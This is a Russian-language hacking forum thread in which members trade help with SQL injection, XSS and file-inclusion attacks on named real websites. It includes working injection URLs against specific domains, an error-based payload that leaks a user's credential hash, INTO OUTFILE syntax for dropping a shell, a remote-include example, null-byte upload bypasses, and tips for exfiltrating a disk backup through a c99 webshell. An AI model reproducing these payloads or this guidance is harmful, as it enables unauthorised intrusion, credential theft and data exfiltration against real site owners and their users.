как раскрутить MSSQL без использования подзапросов, типа селект? (т.к. работает хоть какой то вывод только так: 1',@@version,1,1,1,1)+--+ )

такая ситуация нужно слить архив, с винды 500 мегов,шеллом с99,всо2,закачка обрывается,скопировать файл в директорию которая доступна из веба,я не могу,если ли в природе пхп скрпит с докачкой,кто как сливает большие файлы?

заюзать рар с разбивкой на тома попробуйте

у меня только шелл там, стоит IIS 6.0..
смд там не работает..разумеется
помогите плиз как его слить от туда...
файлы расширением tib,это копия диска C.
или распилить его можно имея только шелл,мегов по 100 самый раз

и все же мой вопрос остается в силе))

и все же мой вопрос остается в силе))
Какой же ты упрямый, вот скажи мне, что тебе даст если тебе скажут КАК? Сразу же отвечу, да ничего, не мозгов не прибавится, не знаний, так как принцип ты так и не поймёшь, неужели самому не интересно докапаться до сути?! Если нет, то и раздел засорять не стоит :)

Приветствую всех!

Нужна помощь! ;)


Доступна информация
Версии протоколов
Описание

Версии поддерживаемых протоколов :
1.99
2.0

***********************************

Доступна информация
Список форм
Описание

Обнаружены формы (POST запрос), использующиеся для передачи данных на сервер. В переменных HIDDEN может храниться специфическая или чувствительная информация. Переменные PASSWORD служат для ввода пароля.

Список форм:

POST /melody/search.php HTTP/1.1
search=

POST /market/list.php HTTP/1.1
good_t=&t=&rid=&location=&price=&cat_id=¤cy=

POST /symb_cert/ HTTP/1.1
skey=&imei=&result=

POST /themegen/ HTTP/1.1
c_opos=&c_m.s.key=&c_name_menu=&c_clock_num=&c_gird_menu_color=&c_gird_menu_hl_color=&c_list_menu_color=&c_list_menu_hl_color=&c_tooday=&i_wallpaper=

POST /themegen/ajax/upload.php?p=s40.240x320 HTTP/1.1
myfile=

POST /books/ HTTP/1.1
name=&file=&otvet=

POST /feedback.php HTTP/1.1
name=&email=&Go=

POST /catalog/add_comment.php?id=3240 HTTP/1.1
skey=&name=&otvet=&go=&functions=&reliability=&design=&price_quality=&vote=

POST /accessories/result.php HTTP/1.1
search=&cat=&display=&led=&voicedial=&panels=&a2dp=&avrcp=&dsp=&length=

POST /wav/w_search.php HTTP/1.1
search=

POST /opinion/new.php HTTP/1.1
name=&subj=&model=&vote=

****************************************

За что тут можно зацепиться?

ни за что, ты просто выцепил все post-формы (наверное все, все что сканер нашел)

PS: Заманали икспайдерами, честное слово.

А про 22 порт SSH-2.0-OpenSSH_4.5p1 FreeBSD-20061110???
Версии поддерживаемых протоколов :
1.99
2.0
Это ничего мне не даст?

Прошу прощения, уже сам нашел ответ

Качай putty http://www.tartarus.org/~simon/putty-snapshots/x86/putty.exe
И пробуй присоединиться к серваку используюя тот логин и пароль =)

А версия ssh тебе ничего не даст у меня там вообще Solaris v 0.1 beta написано =)

P.s
Думаю тебе это ничего не даст так как хостеры чаще всего не предоставляют ssh доступ =)
+ у какого идиота пароли от веба к паролям от sshd подходят o_0 ???

PS: Заманали икспайдерами, честное слово.

Pashkela, я только учусь, не суди строго)

AntiHacker7:

https://forum.antichat.ru/thread153877.html

AntiHacker7:

https://forum.antichat.ru/thread153877.html

Конечно спасибо, но это уже читал, сейчвс изучаю данную тему:

https://forum.antichat.ru/thread104591.html

DrAssault, так я ж не прошу решить мою проблему за меня. Я и пытаюсь вникнуть и хочу чтобы кто либо дал мануал л том как раскрутить MSSQL-inj без подзапросов!

DrAssault, так я ж не прошу решить мою проблему за меня. Я и пытаюсь вникнуть и хочу чтобы кто либо дал мануал л том как раскрутить MSSQL-inj без подзапросов!
Какой мануал? Может кто-нибудь написал мануал по твоему случаю?! Дать тебе ссылку? А сам ты не в состоянии заюзать поиск по форуму? (поговаривают очень полезная вещь) Не поймёшь ты ничего таким образом, читай спецификации, а понимание придёт со временем, но это уже будет другое понимание, более глубокое и осмысленное...

DrAssault, так я ж не прошу решить мою проблему за меня. Я и пытаюсь вникнуть и хочу чтобы кто либо дал мануал л том как раскрутить MSSQL-inj без подзапросов!
Всетаки рекомендую начать с азов.
Узнать какие SQL команды существуют (Select, Insert, Update), их синтаксис. В твоем случае это INSERT (http://msdn.microsoft.com/ru-ru/library/ms174335(SQL.90).aspx) . Попробуй понять можно ли увидеть результаты того что ты вводишь. Если да, то определи список объектов (http://msdn.microsoft.com/ru-ru/library/ms190324(SQL.90).aspx) в базе. Поняв как функционирует база ты сможешь провести атаку например используя несколько команд в одном запросе.

Вот хотел узнать... есть один сайт. не знаю почему, но мне кажется, что он не серьезно защищен, хотя вид деятельности серьезный.
читал статьи по SQL inj, и по XSS, и пробовал там все это принять..
Не знаю это хорошо или плохо, но вот не понял на самом деле уязвимости есть или нет.
на страинце обратный адрес была форма письмы, я там ставил на все поля Java код (из статьи по XSS) и он отправился! (написал, типа спасибо за заявку).
А насчет SQL, ввел простые запросы, типа: site.com/index.php?id=1 и все они показывали главную страницу..
Еще что заметил, это просто так написал в конце адреса admin, и открылся сайт хостера(hoster.ru) а в середине написан "страница не найден".
Какие выводы можно делать? Сильно не пинать, т.к. в этом деле очень и очень плохо разбираюсь пока. т.е. учусь :))

Вот хотел узнать... есть один сайт. не знаю почему, но мне кажется, что он не серьезно защищен, хотя вид деятельности серьезный.
читал статьи по SQL inj, и по XSS, и пробовал там все это принять..
Не знаю это хорошо или плохо, но вот не понял на самом деле уязвимости есть или нет.
на страинце обратный адрес была форма письмы, я там ставил на все поля Java код (из статьи по XSS) и он отправился! (написал, типа спасибо за заявку).
А насчет SQL, ввел простые запросы, типа: site.com/index.php?id=1 и все они показывали главную страницу..
Еще что заметил, это просто так написал в конце адреса admin, и открылся сайт хостера(hoster.ru) а в середине написан "страница не найден".
Какие выводы можно делать? Сильно не пинать, т.к. в этом деле очень и очень плохо разбираюсь пока. т.е. учусь :))
Сайт в студию

Group by дает 6 полей,но подобрать не удается.Кто нибудь может обьяснить в чем причина.

Заранее всем спасибо.

http://www.realtor.am/newbuilding.php?id=10'+group+by+6%23&lang=en


http://www.realtor.am/newbuilding.php?id=10'+union+select+1,2,3,4,5,6%23&lang=en

The used SELECT statements have a different number of columns

Еще что заметил, это просто так написал в конце адреса admin, и открылся сайт хостера(hoster.ru) а в середине написан "страница не найден".

Здесь, все понятно, по не найденным страницам идет редирект на дефолтную (в данном случае на прова), так что диры с именем admin не существует.


на страинце обратный адрес была форма письмы, я там ставил на все поля Java код (из статьи по XSS) и он отправился!

наверное javascript) и вообще зря отправлял, контролировать вывод ты не можешь, так как заявки просматривает токо админ и соответственно как фильтруется твой код понимания нет, отсюда и бесполезность атаки

FlaktW, выводи данные в ошибку, либо поищи скулю в другом параметре

http://www.realtor.am/newbuilding.php?id=10'+union+select+*+from+(select +*+from+(select+name_const((select+concat_ws(0x2F, username,password)+from+users+limit+0,1),14)d)+as+ t+join+(select+name_const((select+concat_ws(0x2F,u sername,password)+from+users+limit+0,1),14)e)b)a--+

Duplicate column name 'anna/fe4127b4a905160580cca06279f92be7'

Group by дает 6 полей,но подобрать не удается.Кто нибудь может обьяснить в чем причина.

Заранее всем спасибо.

http://www.realtor.am/newbuilding.php?id=10'+group+by+6%23&lang=en


http://www.realtor.am/newbuilding.php?id=10'+union+select+1,2,3,4,5,6%23&lang=en

The used SELECT statements have a different number of columns

Проще говоря у тебя Blind sql-inj (слепая скуля)
то есть sql-inj есть но без вывода

https://forum.antichat.ru/thread104591.html
Почитай эту тему для работы с ней

wolmer

Нет, сюда не хочу )) моу в личку кинуть. Но мой цель не взломать его, а тренироватся, хочу сам понимать как все это работает.
Можете помочь?

mr.celt

И что советуешь делать? какие трюки можно выполнить?

И что советуешь делать? какие трюки можно выполнить?

Если хочешь провернуть XSS, то необходимо найти параметры, вывод которых ты можешь видеть, например, то что вводишь в поиске..

Что касатся проверки путей и поиска админки, есть примерно 50 стандартных путей (файлик могу скинуть), вот их и проверяй, если конечно нет какого-либо префикса перед названием.

HAXTA4OK
Как это слепая? А вывод сообщения "The used SELECT statements have a different number of columns".

Как это слепая? А вывод сообщения "The used SELECT statements have a different number of columns".
а ты видиш принтабильное поле через которое можно вывести данные? мм кстате недавно в хакере писали про вывод данных через ошибки но если неошибась это прокатит только в 5 ветке

mr.celt

а вот как насчет того, что все попытки SQL инекции - открывает стартовая страница?
Насчет XSS - негде проверять, т.к. поиск по сайту нету. единственно где нашел ввести данные - это где пишется письмо (оратный адрес)

mr.celt

а вот как насчет того, что все попытки SQL инекции - открывает стартовая страница?
Насчет XSS - негде проверять, т.к. поиск по сайту нету. единственно где нашел ввести данные - это где пишется письмо (оратный адрес)

пробуй:

id=-1/**/unION/**/selECT/**/1,2,3--+

И вообще, читай больше инфи

---

ксс может быть не только в поиске..

пробуй:

id=-1/**/unION/**/selECT/**/1,2,3--+
если пробовать вот так:
http://www.site.ru/?id=-1/**/unION/**/selECT/**/1,2,3--+
то открывает гравная страница (ничем не отличается от www.site.ru)
А если просто вот так:
http://www.site.ru/id=-1/**/unION/**/selECT/**/1,2,3--+
то кидает в сайт хостера, с надпесем:
Ошибка доступа 404 к указанной странице

Может тут какой то "супер" технология работает? или какой-то неприступный СУБД ?

если пробовать вот так:
http://www.site.ru/?id=-1/**/unION/**/selECT/**/1,2,3--+
то открывает гравная страница (ничем не отличается от www.site.ru)
А если просто вот так:
http://www.welcome-bank.ru/id=-1/**/unION/**/selECT/**/1,2,3--+
то кидает в сайт хостера, с надпесем:


Может тут какой то "супер" технология работает? или какой-то неприступный СУБД ?

блин, я даже не знаю как тебе объяснить :o

1) очень быстро перешел на такий сайты
2) читай мануалы!

Тебе в этой (https://forum.antichat.ru/thread153877.html) теме уже рассказали что читать и делать!

Делая запрос:
union+select+1,2,3,4,5,6,7,8,9,group_concat(table_ name),11+from+information_schema.tables
Выдаёт

0

что не так? :(

vot posmotrite http://www.vashstile.ru/admin zdes kak to .htacces..

esli napisu login i parol pravilno moqu zayti v admin panel??

Делая запрос:

Выдаёт

что не так? :(
union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3C42523 E,table_name),11+from+information_schema.tables+li mit+1,1
Не?

DeluxeS

ну скажем так штатный экстрасенс работает сейчас в разделе инклюдов... можно линк в студию?

и зачем тебе использовать здесь concat?
union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3C42523 E,table_name),11+from+information_schema.tables+li mit+1,1

или же делaй запрос без concat-a ... или же попробуй так
union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,tabl e_name,table_schema),11+from+information_schema.ta bles+li mit+1,1

a moy vopros??

LokbatanLi http://translit.ru/

ne nado pomoymu..

vot est takoy sayt http://www.vashstile.ru/admin
v admin panle est .htacces a kak zayti v panel esli login i parol pravilno napisu moqu zayti panel??

LokbatanLi во первых я ни фига не понял твой вопрос, во вторых писать надо не транслитом а кирилицой, в третьих если есть пароль и логин то пробуй зайти милок , кто тебе мешает? там вообщето бейсик авторизация... и в четвертых...ты уже затрахал мой мозг (думаю не только мой)

i ya toje pravilno napisu login i pass nu ne moqu zayti..takoy error Authorization Required//

Может авторизация возможна только с определённого ip

Проще говоря у тебя Blind sql-inj (слепая скуля)
то есть sql-inj есть но без вывода
Есть там вывод...

а ты видиш принтабильное поле через которое можно вывести данные? мм кстате недавно в хакере писали про вывод данных через ошибки но если неошибась это прокатит только в 5 ветке
Можно и через ошибку...

Имеется следующая инъекция в UPDATE-запросе:
update session set value='last_url|s:5:"/[SQL-inj]";', update_date=now() where session_name='3nr3r857efj64a1kcbk7vpepn0'
Что полезного можно сделать в данном случае и как?

a kto mojet raskazat ob file_priv out_into_file magic_quote est dlya etix satey..zaranie spasibo//

a kto mojet raskazat ob file_priv out_into_file magic_quote est dlya etix satey..zaranie spasibo//

Тебе еще не надоело?! юзай поиск по форуму! всё описанно до мельчайших подробностей!

ne nasel dayte link toqda pojalusta//

Народ видел кто небудь переборщик путей через load_file ?(через скулю)
дефолтные не подходят

a kto mojet raskazat ob file_priv out_into_file magic_quote est dlya etix satey..zaranie spasibo//

здесь читать нужно.

file_priv бывает Y и N
Y - есть права у юзера бд на чтение/запись
N - нету прав на чтение/запись

out_into_file
гыгы, мб into outfile ?
Используеться для загрузки файла на сервер через базу данных
Синтаксис:
[select_options] select_list [INTO_OUTFILE file_name export_option

По простонародному:
union select 1,2,3...[n] into outfile 'full_patch/file.php'/*

magic_quote
В двух словах не раскажешь, читай мануал по пхп

Народ видел что переборчик путей через load_file ?(через скулю) девольтные не подходят

Путей к чему?

Имеется следующая инъекция в UPDATE-запросе:
update session set value='last_url|s:5:"/[SQL-inj]";', update_date=now() where session_name='3nr3r857efj64a1kcbk7vpepn0'
Что полезного можно сделать в данном случае и как?
я так понял с твоего запроса,sql injection в параметре ГЕТ session?
если "да",то что мешает ее раскручивать?
param=-false'+order+by+[...]/*

Ins3t
полный путь до сайта, от корня,абсолютный вроде.

Ins3t spasibo po4ti ponel//

Ins3t
полный путь до сайта, от корня,абсолютный вроде.

Если на серваке линух, то поищи httpd.conf, там будет прописан полный путь.


FreeBSD
apache 1.3
/usr/local/etc/apache/httpd.conf

apache 2.2
/usr/local/etc/apache22/httpd.conf

Linux
CentOS, Fedora (Redhat-системы)
/etc/httpd/conf/httpd.conf

Debian, Ubuntu
apache 1.3
/etc/apache/httpd.conf

apache 2.2
/etc/apache2/apache2.conf

Gentoo
apache 2.0
/etc/apache2/httpd.conf

Ins3t
спасибо, но я это уже глядел вот тут http://wiki.apache.org/httpd/DistrosDefaultLayout#Fedora_Core.2C_CentOS.2C_RHEL :
нужен перебор, руками не тянет.
на сервере стоит CentOS

Имеется следующая инъекция в UPDATE-запросе:
update session set value='last_url|s:5:"/[SQL-inj]";', update_date=now() where session_name='3nr3r857efj64a1kcbk7vpepn0'
Что полезного можно сделать в данном случае и как?

Забыл сказать, что вывод только через ошибку или, если это возможно, вслепую.

какой софтиной можно слить все таблицы, а не использовать лимит (СИПТ не предлагать!) П.С.Работаю в 5 версии

какой софтиной можно слить все таблицы, а не использовать лимит (СИПТ не предлагать!) П.С.Работаю в 5 версии
гмм, чем group_concat не устраивает? :) Файл прив есть? Кавычки режутся? А так софтин уйма, да и самому можно написать парсер ;)

гмм, чем group_concat не устраивает?

Хотябы тем, что он имеет ограничение на размер выводимых данных.

Хотябы тем, что он имеет ограничение на размер выводимых данных.
Опять же в зависимости от ситуации и настроек администратора... именно поэтому были ещё вопросы ;)

не могу дальше ничего сделать
http://www.goszakaz.inconnect.ru/?id=10001&n=-3402+union+select+1,COLUMN_NAME,3,4,5,6+FROM+INFOR MATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=user_privil eges--
пробовал перебовать и нех и просто с кавычками и с %27 - результата нет!

расскажите, что дальше?

WHERE+TABLE_NAME=0x757365725f70726976696c65676573

Все работает


InFlame, заюзай мор1ров например

var=blabla'+or+if(substring((select+version()),1,1 )=5,1,(select+1+union+select+2))--+

2 jecka3000
http://www.goszakaz.inconnect.ru/?id=10001&n=-3402+union+select+1,COLUMN_NAME,3,4,5,6+FROM+INFOR MATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x757365725 f70726976696c2065676573--

USER_PRIVILEGES - таблица базы Information_schema. Никакой полезной инфы для тебя (пассы, логины и т.Д.) она не даст

Понимаю. Я написал с мыслью о том что он будет ее юзать, узнав поля

2[x60]unu
Не обязательно хекс, можно и в чар например.
И в даном случае кавычки не прокатят скорее всего из за magic_quotes = on.

Bb0y,это я уже понял, но просто ничего более подходящего там вообще нет!)
Я нашел абсолютно все table_name (софтиной) и ничего подозрительного, типа таблицы user там нет)

2jecka3000
Данные которые ты ищешь не обязательно должны храниться в базе данных.
По поводу таблиц: 17 первых - это стандартные в них можно даже не смотреть(если нету необходимости), и когда перебираешь таблицы лимитом можно начинать не с 1,1 а с 17,1

Ins3t, согласен, и я нашел еще одну БД - goszakaz. И там есть уже хоть что то интересное, типа имена сотрудников,телефоны, сайты,мыла, но ничего подходящего для самого сайта..

2jecka3000
Данные которые ты ищешь не обязательно должны храниться в базе данных.

а где же еще храниться инфе о юзерах,в текствых файлах?
я говорю о данных простых пользователей
+ данный сайт использует БД
то зачем извращаться данными в файлах?

а где же еще храниться инфе о юзерах,в текствых фалах?
Почему бы нет?
некоторые CMS так и работают.
Данные администратора мопросту могут храниться в конфиге, как например в Mini-CMS

Попробуй использовать load_file если привилегии позволят

Почему при загрузке в windows, частичка имени файла преобразуется в %2500 (а было %00) ? (ручным аплоадом делал (т.е. вручную снифал и отправлял пакеты на загрузку))
Есть ли замена нулл байту при аплоаде? (если есть то пример в студию)

Не...все обыскал, результатов нет...

Не...все обыскал, результатов нет...
Знаешь что дружище. Тебе всё показали, дальше сам. Просить ломать госсайты тут не надо. С такими вопросами на свой хек проэкт иди.

PS Ты ведь без носков туда лазил, да?
можно не отвечать :)

Почему при загрузке в windows, частичка имени файла преобразуется в %2500 (а было %00) ? (ручным аплоадом делал (т.е. вручную снифал и отправлял пакеты на загрузку))
Есть ли замена нулл байту при аплоаде? (если есть то пример в студию)
Думаю трабл в тулзе которой ты отсылаешь пакет, он преобразует % в url кодировку, поэтому получается %25.
Замена нулл байту есть, https://forum.antichat.ru/threadnav98525-6-10.html , только прокатывает не всегда.

Думаю трабл в тулзе которой ты отсылаешь пакет
Не думаю (посылал HTTPREQ)
https://forum.antichat.ru/threadnav98525-6-10.html
Насколько я догадываюсь там отрубка идет по GET'у но не через POST (пробывал через пост - не получается)

Не думаю (посылал HTTPREQ)
Значит какой-то неприятный трабл на хосте)

Насколько я догадываюсь там отрубка идет по GET'у но не через POST (пробывал через пост - не получается)
Главное передать параметр, способ значения не имеет :) Видать в твоём случае не катит =\

PS Ты ведь без носков туда лазил, да?
можно не отвечать :)
В шерстяных :)

Главное передать параметр, способ значения не имеет :)
Значение имеет ;)

wolmer, просто имя файла проходит через urlencode()

wolmer, просто имя файла проходит через urlencode()
Как бы нету urlencode в коде
Или я что-то не понимаю?

Где взять гайд по InterBase,а также программы типа SIPT-а для автоматизации ?

GenTao
http://forum.antichat.ru/thread104591.html
http://forum.antichat.ru/search.php?searchid=5649282

Почему при загрузке в windows, частичка имени файла преобразуется в %2500 (а было %00) ? (ручным аплоадом делал (т.е. вручную снифал и отправлял пакеты на загрузку))
Есть ли замена нулл байту при аплоаде? (если есть то пример в студию)
copy() и move_uploaded_file() - null-байт работает

copy() и move_uploaded_file() - null-байт работает
у меня - нет (тоже самое слышал и от разора)

GenTao
http://forum.antichat.ru/thread104591.html
http://forum.antichat.ru/search.php?searchid=5649282

http://forum.antichat.ru/thread104591.html - Где ты там увидел InterBase статейку?
http://forum.antichat.ru/search.php?searchid=5649282 - Вообще не понял,при чём тут сипт...Яон не работает с интербейз походу...нужна программа НАПОДОБИИ сипта.

ЗЫ: За помощь пасип )

GenTao статейки нет ты прав..извини... но ее вообще нет на ачате, так что извини, а второй линк на поиск сипта на форуме...

у меня один ламерский вопрос:
где можно читать что значат спецсимволы в ссылках(запросах) ?
ну вот например вопросительный знак (?) - что это значит и зачем ставится в ссылках?
узал поиск, но кроме query string ничего не нашел..
например:
http://yandex.ru/yandsearch?text=query+string&lr

http://yandex.ru/yandsearch?text=query+string&lr
Этот знак ставится в GET запросе чтобы передать что либо к примеру PHP скрипту
К примеру

<?php
if (isset($_GET['kto_ya'])){
echo "Привет ".$_GET['kto_ya']."!!!";
}
?>

(писал тут сразу)

И при заходе на site.ru/nash_script.php?kto_ya=vasyan

Будет выведенно

Привет vasyan!!!

у меня один ламерский вопрос:
где можно читать что значат спецсимволы в ссылках(запросах) ?
ну вот например вопросительный знак (?) - что это значит и зачем ставится в ссылках?
узал поиск, но кроме query string ничего не нашел..
например:
http://yandex.ru/yandsearch?text=query+string&lr
После вопроса параметры передаваемые скрипту :o

у меня один ламерский вопрос:
где можно читать что значат спецсимволы в ссылках(запросах) ?
ну вот например вопросительный знак (?) - что это значит и зачем ставится в ссылках?
узал поиск, но кроме query string ничего не нашел..
например:
http://yandex.ru/yandsearch?text=query+string&lr

Почитай о GET запросах.

ок. понял, спасибо народ.
? - он может передавать только php скрипты? хотя видел на сайтах ***.asp? .. и можно понять что передает все параметры, где используется GET метод передачи.
а в режиме POST не используется ?

Кстати, как можно узнать на сайте какиекомпоненты используется?
есть один сайт (не простой), но никак немогу узнать что там крутиться. все ссылки типа:
www.site.ru/?q=node/(*) , где * - это цифры от 1 до 12 (по страницам.)
например адрес раздела техподдержки вот такой: http://www.site.ru/?q=node/6

Кстати, как можно узнать на сайте какиекомпоненты используется?
есть один сайт (не простой), но никак немогу узнать что там крутиться. все ссылки типа:
www.site.ru/?q=node/(*) , где * - это цифры от 1 до 12 (по страницам.)
например адрес раздела техподдержки вот такой: http://www.site.ru/?q=node/6

GET, при пост запросах урл не меняется.
node - дириктория.
И стоуктура очень похожа на друпаловскую (движкa drupal)

ок. понял, спасибо народ.
? - он может передавать только php скрипты?
И не токо PHP скриптам (к примеру страницам aspx)

Кстати, как можно узнать на сайте какиекомпоненты используется?
есть один сайт (не простой), но никак немогу узнать что там крутиться. все ссылки типа:
www.site.ru/?q=node/(*) , где * - это цифры от 1 до 12 (по страницам.)
например адрес раздела техподдержки вот такой: http://www.site.ru/?q=node/6
Что значит компоненты? Ну если в двиге исп. "компоненты" то смотря какой двиг

http://www.site.ru/?q=node/6
Может быть такой код... (но наврятли :) )

<?php
if (isset($_GET['q'])){
include("http://www.site.ru/?q=".$_GET['q'].".php");
}
?>

Всем привет.
Xttp://www.wmkopilka.ru/coinbox.php?5240'
Кто что скажет? Два дня пытался крутить результата ноль

Есть =)

http://wmkopilka.ru/coinbox.php?5240'/**/and/**/substring((select/**/version()),1,1)=5/**/and/**/'1'='1

2 ElteRUS:

молоток, только можно и без select:

http://wmkopilka.ru/coinbox.php?5240'/**/and/**/substring(version(),1,1)=5/**/and/**/'1'='1

2 ElteRUS:

молоток, только можно и без select:
А можно вообще без substring, т.к. мускуль конвертирует типы данных.
http://wmkopilka.ru/coinbox.php?5240'/**/and/**/version()=5/**/and/**/'1'='1

А можно и вывод сделать:http://wmkopilka.ru/coinbox.php?5240'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1
Duplicate column name '5.0.67'
https://forum.antichat.ru/showpost.php?p=1494443&postcount=11
Для кого человек старался? Почему не используете? ;)

<?php
if (isset($_GET['q'])){
include("http://www.site.ru/?q=".$_GET['q'].".php");
}
?>
Этот код сохранить как php скрипт и запустить? и что узнаю? (т.е. что он делает)?

Я вот хотел узнать к чему можно "подцепиться" :)) чтоб дальше узнать что делать.

Нет так сказать "универсальные" трюки для уловки SQL инекци ?

sorry за оффтоп, кто короче? :)
http://wmkopilka.ru/coinbox.php?5'*version()/'5
Умно:) 5*5/5 :)

Умно:) 5*5/5 :)
/add аа блин, первый вариант тоже правильный), напрасная параноя с 6/5
все таки лучше так
http://wmkopilka.ru/coinbox.php?5240'+version()-'5 = http://wmkopilka.ru/coinbox.php?5240

Этот код сохранить как php скрипт и запустить? и что узнаю? (т.е. что он делает)?

Я вот хотел узнать к чему можно "подцепиться" :)) чтоб дальше узнать что делать.

Нет так сказать "универсальные" трюки для уловки SQL инекци ?

Какой SQL inj ?
Здесь базой данных то и не пахнет.
У тебя есть инклайд.


<?php
if (isset($_GET['q'])){
include($_GET['q'].".php");
}
?>


ты получишь RFI (Remote File Include):

site.com/script.php?q=http://site.net/file

рузумееться при сообтетствующей конфигурации WEB сервера.

А именно - для RFI должен быть включен allow_url_include в php.ini

Так же можно юзать как и лфи.

Советую почитать статью задохлика:
http://forum.antichat.ru/thread23501.html

на днях первый раз в жизни столкнулся со следующим адресом:
www.site.com/default.php?show=100+and+ascii(lower(substring(ver sion(),1,1)))=51
Можете объяснить или дать что либо почитать, что, в какой версии и вообще где применяется ......+and+ascii(lower(substring(version(),1,1)))= 51

Кури Blind SQL inj

http://forum.antichat.ru/thread19844.html
Затем прочти пару статей от електа на тему реализации more1row инъецкий.
Так же говорять что Qwazar очень хорошо описал какую то новую технотогию, точно не скажу, сам еще не читал эту статью.

можеть кто знает в Jet database error

на запрос:
=-1+order+by+5%00
выдает:

Microsoft JET Database Engine error '80040e14'
The Microsoft Jet database engine does not recognize '6' as a valid field name or expression.
а на:

=-1+order+by+4%00

страница открывается, но на нем тоже
Latest News


Microsoft JET Database Engine error '80040e14'
The Microsoft Jet database engine does not recognize '4' as a valid field name or expression.
/intranet/inx/ecom_engine.asp, line 2462

на запрос:
=-1+union+select+1,2,3,4%00
Microsoft JET Database Engine error '80004005'

Query input must contain at least one table or query.

/intranet/inx/ecom_engine.asp, line 2462

как обойти? Правда ни одного названия таблиц не знаю.
Может есть новые статьи по Jet database

Это Access. Статья:
http://forum.antichat.ru/thread50550.html

Кстати, читаю про PHP inject (include), мне даже очень интересно кажется :)) спасибо за направление !
Кстати, хотел узнать тенденцию этого уязвимости.. т.е. актино приниается, или редко встречается ? (по сравнение SQL инекции)

на 1 из предложенных багов месте по распространенности идет sql injection
а потом и PHP injection
вообще пхп иньекцию можно встретить часто)))

[x60]unu

это хорошо )) думаю php inject легче изучать, чем sql ))
а еще такой ламерсий вопрос:
- какие данные можно получить?

Через LFI можно инклудить логи, сессии, конфиги.
С RFI думаю все ясно.

В зависимости от ситуации в идеале можно получить шелл инклудом или выполнить любой код на системе.

на сколько понял - о сливи БД тут речь не может идти.. это уже SQL инекцями, да?
про LFI/RFI-уязвимости читал ЗДЕСЬ (http://raz0r.name/vulnerabilities/lfirfi-uyazvimosti-v-wap-motor-175/) , но не очень понятно был что, зачем и как.. попробую еще искать ...
спасибо за помощь.

Это Access. Статья:
http://forum.antichat.ru/thread50550.html
спс но я это много раз прочитал, я имел ввиду новые обходы по этому обстоятельству

B1t.exe
Давай ты всётаки не будешь засорять эту тему. Вот же твоя тема, она открыта:

https://forum.antichat.ru/threadedpost1665798.html#post1665798

тут рассматриваем конкретные уязвимости, сложности с ними, и т.д. Для твоих вопросов(и аналогичных) специально оставил ту тему

YuNi|[c
Обходы чего? Если ты читал статью, то должен был увидеть, что выборка в Access ОБЯЗАТЕЛЬНО должна быть из существующей таблицы. Ты это хочешь обойти что-ли? Или ты хочешь что-бы мы писали тебе варианты таблиц, а ты проверял? Линка-то нет.

Сформулируй вопрос яснее

чем можно править гет запрос налету?

B1t.exe
Давай ты всётаки не будешь засорять эту тему. Вот же твоя тема, она открыта:

https://forum.antichat.ru/threadedpost1665798.html#post1665798

тут рассматриваем конкретные уязвимости, сложности с ними, и т.д. Для твоих вопросов(и аналогичных) специально оставил ту тему

YuNi|[c
Обходы чего? Если ты читал статью, то должен был увидеть, что выборка в Access ОБЯЗАТЕЛЬНО должна быть из существующей таблицы. Ты это хочешь обойти что-ли? Или ты хочешь что-бы мы писали тебе варианты таблиц, а ты проверял? Линка-то нет.

Сформулируй вопрос яснее
да нет я просто спросил возможно ли другие варианты обхода без знания таблиц, а то за..лся с этим скулем

если нету доступа к msysobjects,а так обычно и бывает,то только подбирать наугад таблицы.Можно ещё попробывать как здесь http://forum.antichat.ru/showpost.php?p=523825&postcount=36

чем можно править гет запрос налету?
что значит налету? если огнелисом пользуешься то есть соответсвующий плугин. (модификация http заголовков)

на сколько понял - о сливи БД тут речь не может идти.. это уже SQL инекцями, да?
про LFI/RFI-уязвимости читал ЗДЕСЬ (http://raz0r.name/vulnerabilities/lfirfi-uyazvimosti-v-wap-motor-175/) , но не очень понятно был что, зачем и как.. попробую еще искать ...
спасибо за помощь.

на ачате есть куча статей по LFI/RFI-уязвимостям
ты сначала с одним расберись (sql-ing), потом уже изучай что-то другое

что значит налету? если огнелисом пользуешься то есть соответсвующий плугин. (модификация http заголовков)
т.е. например есть флешка она отсылает гет запрос примерно такого вида http://localhost/gate.php?test=asdfg так вот в тот момент как она его отсылает мне надо поправить значение test. Пробывал тампер дату но как оказалось она такое неумеет, а ты про какой плагин говорил?

т.е. например есть флешка она отсылает гет запрос примерно такого вида http://localhost/gate.php?test=asdfg так вот в тот момент как она его отсылает мне надо поправить значение test. Пробывал тампер дату но как оказалось она такое неумеет, а ты про какой плагин говорил?

плагин для фф - Charles

не могу раскрутит дальше
http://wallstreetcorner.com:80/ss2.html?Symbol='

можеть кто поможеть?

выдает:


An error occurred processing your request
Merging data into macro form: e:\cyberspace\wallstreetcorner\ss2.html
WebBase ODBC error in: {sql to Special source 'clients' user 'admin'}
**ODBC/driver/database error in sql statement:
{sql to Special source 'clients' user 'admin'}
SELECT * FROM Situations WHERE Symbol = ''' ORDER BY ID
{/sql}

Using cached connection:: 'clients'/'admin'/' ' ('Microsoft Access Driver (*.mdb)' SYN 3804 11/09/09 21:16:35 EST 11/09/09 22:49:17 EST +1:32:42 0)

ODBC API call: 'statement executeDirect:' returned the following error message: '
{execDirect}[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'Symbol = ''' ORDER BY ID'. (sqlState: 37000)
SELECT * FROM Situations WHERE Symbol = ''' ORDER BY ID

WebBase ODBC (EwXx08.120@Windows 2000 5.0) **

In file: e:\cyberspace\wallstreetcorner\ss2.html
inserted by: e:\cyberspace\wallstreetcorner\disclaimer.html ;; near line number 6

;; following starts near line number 7 in your source form...
...
{set Iaccept 'YES'}
{setUser userIaccept Iaccept}

{sql to Special source 'clients' user 'admin'}
SELECT * FROM Situations WHERE Symbol = '{Symbol}'
ORDER BY ID
{/sql}

{forRow aRow on Special max 1}

...
**

MSSQL вроде, но что за дурацкая реакция на ошибку???
Кто знает?
не всегда же так.обчно просто строчка...ошибка там та и все.

Что имеем?
Тип БД - MSSQL
Раскрытие путей - e:\cyberspace\wallstreetcorner\disclaimer.html
запрос к бд - SELECT * FROM Situations WHERE Symbol = '11111111111'' ORDER BY ID
при Symbol=11111111111'

+ EwXx08.120@Windows 2000 5.0)

